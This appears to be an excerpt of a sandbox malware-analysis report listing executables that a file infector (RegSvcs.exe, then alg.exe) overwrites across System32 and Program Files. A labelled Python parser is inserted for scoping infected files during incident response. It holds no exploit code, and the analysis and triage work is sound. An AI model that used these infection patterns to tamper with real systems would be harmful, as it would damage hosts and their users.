              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Windows\System32\TieringEngineService.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Windows\System32\alg.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
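The rows above are the evidence behind the "Infects executable files" and "Drops executable to a common third party application directory" signatures. Two writers appear: RegSvcs.exe rewrites service binaries under System32 (among them alg.exe, VSSVC.exe, SearchIndexer.exe and ssh-agent.exe), and alg.exe, itself one of RegSvcs.exe's targets, then overwrites executables across Program Files. One caveat for incident response: the target set is simply whatever was installed in the sandbox image, so on a real host the scope is "every executable under System32 and Program Files that now fails Authenticode verification" (Get-AuthenticodeSignature in PowerShell, or a hash comparison against a clean image), not this exact list. The parser below is an added example and not Joe Sandbox code; it ingests rows in the report's "Source: <process><action>: <path>" shape, tolerates the "Jump to behavior" / "Jump to dropped file" link text that clings to rows copied out of the page, and separates in-place overwrites of existing executables from fresh drops. The sample rows, the directory prefixes and all function names are constructed for the example.

```python
"""Parse Joe Sandbox behaviour rows of the form
'Source: <process><action>: <path>[Jump to behavior|Jump to dropped file]'
and scope a file infector's writes. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?)"
    r"(?P<action>System file written|File created):\s*"
    r"(?P<target>.+?)"
    r"(?:Jump to behavior|Jump to dropped file)?\s*$"
)

# Locations where an existing executable being rewritten in place is the
# evidence behind the report's "Infects executable files" signature
# (assumption: these prefixes are what "system file" means for triage).
PROTECTED_PREFIXES = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",  # also covers "c:\program files (x86)"
)
EXEC_SUFFIXES = (".exe", ".dll", ".sys")

# Constructed sample rows in the shape of the listing above; residue varies,
# and a non-behaviour line is included to show it is ignored.
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\32DE8C23\nss3.dllJump to dropped file
Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
Malicious sample detected (through community Yara rule)
"""


def parse_row(line):
    """Return {'source', 'action', 'target'} for one behaviour row, else None."""
    m = ROW_RE.match(line)
    if not m:
        return None
    return {k: m.group(k).strip() for k in ("source", "action", "target")}


def parse_report(text):
    """Parse every behaviour row in a block of report text, skipping the rest."""
    return [rec for rec in map(parse_row, text.splitlines()) if rec]


def is_protected_executable(path):
    """True for an executable under System32/SysWOW64/Program Files."""
    p = path.lower()
    return p.startswith(PROTECTED_PREFIXES) and p.endswith(EXEC_SUFFIXES)


def scope_writes(rows):
    """Group in-place overwrites of existing executables by writing process and
    keep fresh drops (Temp payload DLLs and the like) in a separate list."""
    infected = defaultdict(set)
    dropped = set()
    for r in rows:
        if is_protected_executable(r["target"]):
            infected[r["source"]].add(r["target"])
        else:
            dropped.add(r["target"])
    return {
        "infected_by_writer": {k: sorted(v) for k, v in infected.items()},
        "dropped": sorted(dropped),
    }


def hunt_list(rows):
    """Unique overwritten executables, sorted, for hashing or signature checks."""
    return sorted({r["target"] for r in rows if is_protected_executable(r["target"])})


def rewritten_writers(rows):
    """Processes that are both a target and a writer: the propagation chain
    (here alg.exe is overwritten by RegSvcs.exe and then writes on its own)."""
    targets = {r["target"].lower() for r in rows}
    return sorted({r["source"] for r in rows if r["source"].lower() in targets})


if __name__ == "__main__":
    parsed = parse_report(SAMPLE_ROWS)
    scoped = scope_writes(parsed)
    for writer, files in scoped["infected_by_writer"].items():
        print(f"{writer} rewrote {len(files)} executable(s) in place")
    print("fresh drops:", scoped["dropped"])
    print("second-stage writers:", rewritten_writers(parsed))
```

Feed the full "System file written" and "File created" sections through parse_report to get the complete hunt list; rewritten_writers is the quickest way to see which overwritten system binary carries the infector forward.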
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\msvcp140.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\snmptrap.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\Spectrum.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\7-Zip\7z.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\ucrtbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\FXSSVC.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\SensorDataService.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\wbem\WmiApSrv.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-console-l1-1-0.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Local\Temp\32DE8C23\api-ms-win-crt-multibyte-l1-1-0.dll
